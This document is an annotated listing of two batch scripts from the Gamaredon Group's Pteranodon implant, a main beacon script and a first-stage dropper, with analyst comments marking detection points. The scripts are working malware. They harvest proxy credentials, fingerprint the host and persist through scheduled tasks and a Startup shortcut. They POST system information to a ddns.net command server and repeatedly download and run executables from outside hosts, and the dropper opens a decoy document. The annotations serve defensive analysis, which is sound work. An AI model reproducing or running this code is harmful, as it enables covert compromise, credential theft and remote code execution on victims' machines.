REM @VK_INTEL
REM Gamaredon Group Pteranodon Implant Ver "arm_11.04"
REM MD5: 49cde7d0ca755f0c284d9690e84711ac
REM MAIN .cmd GAMAREDON GROUP
@echo off
REM Setup stage of the main implant script: reads the user's IE proxy settings,
REM fingerprints the host, stages the bundled downloader under APPDATA and
REM registers three scheduled tasks. Detection points are noted inline.
REM The recurring lines "set OCXkMSu=..." and "If lfAjVRt==x86 ..." are inert
REM padding: OCXkMSu and WrWCYaC are never read anywhere in this listing and
REM lfAjVRt is compared as a literal string, so the Set never runs.
set OCXkMSu=%random%*qBKBDuY
REM Console code page 1251 - Windows Cyrillic; the command output is discarded.
chcp 1251>NUL
set OCXkMSu=%random%*qBKBDuY
REM Delayed expansion is required by the line-accumulation loop further down.
setlocal enabledelayedexpansion
set OCXkMSu=%random%*qBKBDuY
REM Registry path of the per-user Internet Settings key, assembled piecewise:
REM HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings
set "SAcJRNH=HKCU\Software"
set OCXkMSu=%random%*qBKBDuY
set "TSaGECa=Microsoft\Windows"
set OCXkMSu=lfAjVRt+qBKBDuY-zpgpDXv*WrWCYaC
set "tKAJClI=CurrentVersion\Internet Settings"
set OCXkMSu=%random%*qBKBDuY
set vJWOqeJ="%SAcJRNH%\%TSaGECa%\%tKAJClI%"
set OCXkMSu=%random%*qBKBDuY
REM Harvest the user's proxy settings from that key. HIEqpGt = ProxyServer,
REM OPkMxWO = ProxyUser, cKIlfDD = ProxyPass; they are reused below to route
REM the downloads and the beacon through the proxy when one is configured.
For /F "UseBackQ Tokens=2*" %%a In (`Reg.exe Query %vJWOqeJ%^|Find /I "ProxyServer"`) do set HIEqpGt=%%b
set OCXkMSu=%random%*qBKBDuY
For /F "UseBackQ Tokens=2*" %%s In (`Reg.exe Query %vJWOqeJ%^|Find /I "ProxyUser"`) do set OPkMxWO=%%t
set OCXkMSu=%random%*qBKBDuY
For /F "UseBackQ Tokens=2*" %%t In (`Reg.exe Query %vJWOqeJ%^|Find /I "ProxyPass"`) do set cKIlfDD=%%u
set OCXkMSu=lfAjVRt+qBKBDuY-zpgpDXv*WrWCYaC
REM Host fingerprint: zbjxUmC = C: volume serial number, taken as token 4 of
REM the second line of "vol c:", or token 5 when token 4 is the English word
REM "is". The serial number becomes part of the bot id and of the task names.
For /F "skip=1 Tokens=4*" %%s In ('vol c:') Do set zbjxUmC=%%s
if %zbjxUmC%==is (
For /F "skip=1 Tokens=5*" %%t In ('vol c:') Do set zbjxUmC=%%t
)
set OCXkMSu=%random%*qBKBDuY
REM Implant version string reported in the beacon. NOTE: in cmd everything
REM after the equals sign, including the trailing REM text, becomes part of
REM the value; that annotation is presumably the analyst's, so confirm the
REM exact versiya value against the original sample.
set wSGVlRE=arm_11.04 REM VERSION arm_11.04
set OCXkMSu=%random%*qBKBDuY
REM BGZWoiS is assigned here but never read in this listing.
set BGZWoiS=0
set OCXkMSu=lfAjVRt+qBKBDuY-zpgpDXv*WrWCYaC
REM Collect "systeminfo" into a file named lqBFmcw in the current directory,
REM then join its non-empty lines into KodJXXa with "+###" separators. The
REM result is sent as the sysinfo field of the beacon POST.
systeminfo > lqBFmcw
set OCXkMSu=%random%*qBKBDuY
FOR /F "tokens=*" %%a IN (lqBFmcw) do @IF NOT i%%a==i set KodJXXa=!KodJXXa!%%a+###
If lfAjVRt==x86 Set WrWCYaC=x64
REM Bot id: COMPUTERNAME, an underscore, and the serial with dashes removed.
set PMjwyhB=%computername%_%zbjxUmC:-=%
set OCXkMSu=lfAjVRt+qBKBDuY-zpgpDXv*WrWCYaC
REM Command-and-control URL assembled from scheme, host label and domain.
REM The pieces set below give winrouts.ddns.net - the header annotation spells
REM the host differently - and the same trailing-REM caveat as for the version
REM string applies to the scheme value on this line.
set FQXAWoz=http REM URL http://winroutes.dddns.net
set OCXkMSu=%random%*qBKBDuY
set EsCAJqG=winrouts
set OCXkMSu=%random%*qBKBDuY
set DHpcPVP=ddns.net
If lfAjVRt==x86 Set WrWCYaC=x64
set OjODhgJ=%FQXAWoz%://%EsCAJqG%.%DHpcPVP%
set OCXkMSu=lfAjVRt+qBKBDuY-zpgpDXv*WrWCYaC
REM richtime: base name of the payload file written by the beacon loop.
set CMLoZoy=richtime
set OCXkMSu=%random%*qBKBDuY
REM Staging directory: APPDATA\Microsoft\IE.
set "CEDGOdz=%APPDATA%\Microsoft\IE"
set OCXkMSu=%random%*qBKBDuY
REM MicrosoftCreate.exe is the bundled downloader. Its option set below -
REM --user-agent, --post-data, -q, -N, -O, -b, -c, -t, -P, -e http_proxy -
REM matches GNU wget, so presumably a renamed wget build; confirm from the binary.
set XnYEPFS=MicrosoftCreate
set OCXkMSu=lfAjVRt+qBKBDuY-zpgpDXv*WrWCYaC
REM ie_cash: name of the staged downloader copy and prefix of the task names.
set FDcBWfh=ie_cash
If lfAjVRt==x86 Set WrWCYaC=x64
REM setup: base name of the second-stage file fetched and run by the tasks.
set ncClIKV=setup
set OCXkMSu=%random%*qBKBDuY
REM bitwork: host label of the download server, bitwork.ddns.net.
set BJZvOCP=bitwork
REM Hard-coded Android browser User-Agent used for the beacon POST; a useful
REM proxy-log indicator because it does not match a Windows host.
set per_23="Mozilla/5.0 (Linux; Android 5.1; Neffos C5 Build/LMY47D) Mobile Safari/537.36"
set OCXkMSu=%random%*qBKBDuY
REM Stage the downloader: create the IE directory and copy the binary there as
REM ie_cash.exe. An executable appearing under APPDATA\Microsoft\IE is a
REM file-creation detection point.
MD "%CEDGOdz%"
If lfAjVRt==x86 Set WrWCYaC=x64
copy "%XnYEPFS%.exe" "%CEDGOdz%\%FDcBWfh%.exe" /y
set OCXkMSu=%random%*qBKBDuY
REM Persistence via scheduled tasks named ie_cash_SERIAL_01, _02 and _03:
REM  _01 every 30 min: ie_cash.exe with -b -c -t 5 fetches
REM      bitwork.ddns.net/BOTID/setup.exe into USERPROFILE
REM  _02 every 32 min: runs USERPROFILE\setup.exe
REM  _03 every 31 min: as _01 but through the harvested proxy, created only
REM      when a ProxyServer value was found
REM schtasks /Create launched from cmd.exe with these task names is the
REM primary host indicator for this stage.
schtasks /Create /SC MINUTE /MO 30 /F /tn %FDcBWfh%_%zbjxUmC:-=%_01 /tr "%CEDGOdz%\%FDcBWfh%.exe -b -c -t 5 '%FQXAWoz%://%BJZvOCP%.%DHpcPVP%/%PMjwyhB%/%ncClIKV%.exe' -P '%USERPROFILE%'"
set OCXkMSu=lfAjVRt+qBKBDuY-zpgpDXv*WrWCYaC
schtasks /Create /SC MINUTE /MO 32 /F /tn %FDcBWfh%_%zbjxUmC:-=%_02 /tr "%USERPROFILE%\%ncClIKV%.exe"
If lfAjVRt==x86 Set WrWCYaC=x64
if defined HIEqpGt (
schtasks /Create /SC MINUTE /MO 31 /F /tn %FDcBWfh%_%zbjxUmC:-=%_03 /tr "%CEDGOdz%\%FDcBWfh%.exe -e http_proxy=http://%HIEqpGt% --proxy-user=%OPkMxWO% --proxy-password=%cKIlfDD% -b -c -t 3 '%FQXAWoz%://%BJZvOCP%.%DHpcPVP%/%PMjwyhB%/%ncClIKV%.exe' -P '%USERPROFILE%'"
)
set OCXkMSu=%random%*qBKBDuY
:stBFkIN
REM Beacon loop - never exits: random sleep, POST host data to the C2, save the
REM response as richtime.exe, and run it via :rDEwHEx when it is at least
REM 50002 bytes. The goto at the end returns to this label.
set OCXkMSu=lfAjVRt+qBKBDuY-zpgpDXv*WrWCYaC
REM uzlhpGg = 37 * RANDOM / 32768, i.e. a jitter of 0 to 36 seconds.
set /a uzlhpGg=37*%RANDOM%/32768
If lfAjVRt==x86 Set WrWCYaC=x64
set OCXkMSu=%random%*qBKBDuY
REM The ping result is not checked; it only adds delay.
ping -n 8 8.8.8.8
set OCXkMSu=%random%*qBKBDuY
timeout /t %uzlhpGg%
set OCXkMSu=%random%*qBKBDuY
REM Kill any downloader instance still running from the previous round.
taskkill /f /im %XnYEPFS%.exe
set OCXkMSu=%random%*qBKBDuY
set OCXkMSu=lfAjVRt+qBKBDuY-zpgpDXv*WrWCYaC
REM Beacon: POST versiya, comp, id and the full systeminfo dump to OjODhgJ and
REM write the response to richtime.exe. The URL is passed twice, once quoted
REM and once bare; spaces are stripped from the version and id values.
%XnYEPFS%.exe --user-agent=%per_23% --post-data="versiya=%wSGVlRE: =%&comp=%computername%&id=%PMjwyhB: =%&sysinfo=%KodJXXa%" "%OjODhgJ%" -q -N %OjODhgJ% -O %CMLoZoy%.exe
set OCXkMSu=lfAjVRt+qBKBDuY-zpgpDXv*WrWCYaC
REM The same beacon again through the harvested proxy when ProxyServer was
REM found. The proxy credentials are placed on the command line, so they show
REM up in process-creation telemetry.
if defined HIEqpGt (
%XnYEPFS%.exe --user-agent=%per_23% -e http_proxy=http://%HIEqpGt% --proxy-user=%OPkMxWO% --proxy-password=%cKIlfDD% --post-data="versiya=%wSGVlRE: =%&comp=%computername%&id=%PMjwyhB: =%&sysinfo=%KodJXXa%" "%OjODhgJ%" -q -N %OjODhgJ% -O %CMLoZoy%.exe
)
timeout /T 5
If lfAjVRt==x86 Set WrWCYaC=x64
REM RjMaKPC = size of richtime.exe in bytes. When the file is missing the size
REM expansion is empty and the assignment fails, so it should keep the 0 set here.
set /a RjMaKPC=0
set OCXkMSu=%random%*qBKBDuY
for %%b in (%CMLoZoy%.exe) do (set /a RjMaKPC=%%~Zb)
set OCXkMSu=%random%*qBKBDuY
REM Only a response of at least 50002 bytes is treated as a payload; anything
REM smaller is left on disk until the next round.
if %RjMaKPC% GEQ 50002 call :rDEwHEx
set OCXkMSu=lfAjVRt+qBKBDuY-zpgpDXv*WrWCYaC
REM Second jitter of 0 to 31 seconds plus a ping delay, then loop.
set /a uzlhpGg=32*%RANDOM%/32768
set OCXkMSu=%random%*qBKBDuY
timeout /t %uzlhpGg%
If lfAjVRt==x86 Set WrWCYaC=x64
ping -n 7 8.8.8.8
set OCXkMSu=lfAjVRt+qBKBDuY-zpgpDXv*WrWCYaC
set OCXkMSu=%random%*qBKBDuY
goto stBFkIN
:rDEwHEx
REM Run the downloaded richtime.exe, wait roughly ten seconds using ping as a
REM timer, then delete the file and return to the loop. The short on-disk
REM lifetime means collection has to rely on process-creation telemetry or
REM on-access scanning rather than a later file sweep.
start "" "%CMLoZoy%.exe"
set OCXkMSu=%random%*qBKBDuY
ping -n 11 google.com
set OCXkMSu=%random%*qBKBDuY
del /q /f "%CMLoZoy%.exe"
set OCXkMSu=%random%*qBKBDuY
exit /b
REM FIRST-STAGE .cmd
@echo off
REM First-stage dropper. It expects the files 19317, 14787, 6120 and winsetup
REM in its current directory - presumably extracted alongside it. Variable
REM names collide with the main script's but the meanings differ; the two are
REM separate files.
REM The recurring "set OCXkMSu=...", "set lfAjVRt=..." and "if lfAjVRt==..."
REM lines are inert: the comparisons use literal strings and none of these
REM variables is expanded anywhere in this listing.
if lfAjVRt==zpgpDXv set lfAjVRt=%random%*OCXkMSu-qBKBDuY
REM Analysis-tool check: look for wireshark.exe and procexp.exe in the task
REM list and bail out when Find reports a match. ErrorLevel is tested once,
REM after the loop, so it reflects only the last iteration. No :exit label
REM exists in this listing; in cmd a goto to a missing label ends the script,
REM which is presumably the intended effect.
For %%c In (wireshark procexp) do (
TaskList /FI "ImageName EQ %%c.exe" | Find /I "%%c.exe"
)
If %ErrorLevel% NEQ 1 goto exit
set OCXkMSu=%random%*qBKBDuY
set lfAjVRt=WrWCYaC+qBKBDuY
REM zbjxUmC = the per-user Startup folder; the .lnk dropped there below is
REM this stage's persistence mechanism.
set "zbjxUmC=%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\"
set OCXkMSu=lfAjVRt+qBKBDuY-zpgpDXv*WrWCYaC
set OCXkMSu=%random%*qBKBDuY
set "wSGVlRE=%USERPROFILE%"
If lfAjVRt==x86 Set WrWCYaC=x64
REM winsetup: base name of the dropped executable and of its shortcut.
set lqBFmcw=winsetup
if lfAjVRt==zpgpDXv set lfAjVRt=%random%*OCXkMSu-qBKBDuY
If lfAjVRt==x86 Set WrWCYaC=x64
REM Document: name given to bundled file 6120 when it is opened at the end,
REM presumably a decoy shown to the user.
set "KodJXXa=Document"
set lfAjVRt=WrWCYaC+qBKBDuY
set PMjwyhB=%lqBFmcw%.lnk
set OCXkMSu=lfAjVRt+qBKBDuY-zpgpDXv*WrWCYaC
set lfAjVRt=WrWCYaC+qBKBDuY
REM Bundled component file names: 14787 becomes winsetup.lnk, 6120 becomes
REM Document.docx, 19317 becomes 19317.exe and is executed first.
set EsCAJqG=14787
If lfAjVRt==x86 Set WrWCYaC=x64
set OjODhgJ=6120
set CMLoZoy=19317
set OCXkMSu=%random%*qBKBDuY
REM Passed to 19317.exe as a "-p" argument below - looks like a self-extractor
REM password; confirm from the binary.
set CEDGOdz=dcthfdyjdfcdst,tv
If lfAjVRt==x86 Set WrWCYaC=x64
set lfAjVRt=WrWCYaC+qBKBDuY
taskkill /f /im %lqBFmcw%.exe
set OCXkMSu=lfAjVRt+qBKBDuY-zpgpDXv*WrWCYaC
REM Give 19317 an .exe extension and run it with the -p value. The opening
REM quote on that argument is never closed in the original.
RENAME "%CMLoZoy%" %CMLoZoy%.exe
if lfAjVRt==zpgpDXv set lfAjVRt=%random%*OCXkMSu-qBKBDuY
%CMLoZoy%.exe "-p%CEDGOdz%
If lfAjVRt==x86 Set WrWCYaC=x64
REM Copy winsetup to USERPROFILE\winsetup.exe and start it from there via
REM :dsGfcXj; if the copy is not present fall back to :stBFkIN, which runs it
REM from the current directory instead.
copy /y "%lqBFmcw%" "%wSGVlRE%\%lqBFmcw%.exe"
set lfAjVRt=WrWCYaC+qBKBDuY
if exist "%wSGVlRE%\%lqBFmcw%.exe" call :dsGfcXj
set OCXkMSu=%random%*qBKBDuY
if not exist "%wSGVlRE%\%lqBFmcw%.exe" call :stBFkIN
if lfAjVRt==zpgpDXv set lfAjVRt=%random%*OCXkMSu-qBKBDuY
REM Persistence: rename 14787 to winsetup.lnk and copy it into the Startup
REM folder. A new .lnk appearing in that folder is the detection point here.
RENAME "%EsCAJqG%" %PMjwyhB%
set lfAjVRt=WrWCYaC+qBKBDuY
copy "%PMjwyhB%" "%zbjxUmC%" /y
If lfAjVRt==x86 Set WrWCYaC=x64
REM Rename 6120 to Document.docx and open it with the default handler.
RENAME "%OjODhgJ%" "%KodJXXa%.docx"
set lfAjVRt=WrWCYaC+qBKBDuY
"%CD%\%KodJXXa%.docx"
if lfAjVRt==zpgpDXv set lfAjVRt=%random%*OCXkMSu-qBKBDuY
exit /b
:dsGfcXj
REM Launch the copy placed in USERPROFILE - winsetup.exe - and return.
set lfAjVRt=WrWCYaC+qBKBDuY
start "" "%wSGVlRE%\%lqBFmcw%.exe"
set OCXkMSu=lfAjVRt+qBKBDuY-zpgpDXv*WrWCYaC
exit /b
:stBFkIN
REM Fallback used when the copy to USERPROFILE is missing: rename the bundled
REM winsetup file to winsetup.exe in place and start it from the current
REM directory. Same label name as the main script's beacon loop, but this is
REM a separate file.
if lfAjVRt==zpgpDXv set lfAjVRt=%random%*OCXkMSu-qBKBDuY
RENAME "%lqBFmcw%" %lqBFmcw%.exe
::6
start "" "%lqBFmcw%.exe"
set OCXkMSu=%random%*qBKBDuY
exit /b